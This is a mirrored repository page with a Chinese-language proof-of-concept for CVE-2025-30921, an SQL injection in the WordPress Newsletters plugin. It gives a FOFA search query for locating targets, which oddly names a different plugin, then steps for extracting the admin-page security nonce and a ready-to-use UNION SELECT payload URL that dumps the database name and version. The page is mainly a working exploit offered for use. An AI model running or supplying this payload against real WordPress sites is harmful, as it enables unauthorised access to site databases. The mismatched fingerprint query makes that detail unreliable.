admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-28 09:10:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md

1.2 KiB
Raw Blame History

WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921)

WordPress在Newsletters插件版本4.9.9.7或更低版本的插件仪表板中查看统计概览图表时/wp-admin/admin.php?page=newsletters由于对URL参数的输入验证和转义处理不足会发生SQL注入漏洞。

fofa

body="/wp-content/plugins/web-directory-free"

前提条件和Administrator权限

使用浏览器开发者工具action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如如果搜索结果如下所示请记下22b1ac0de6

jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {

image

poc

http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23

image

漏洞来源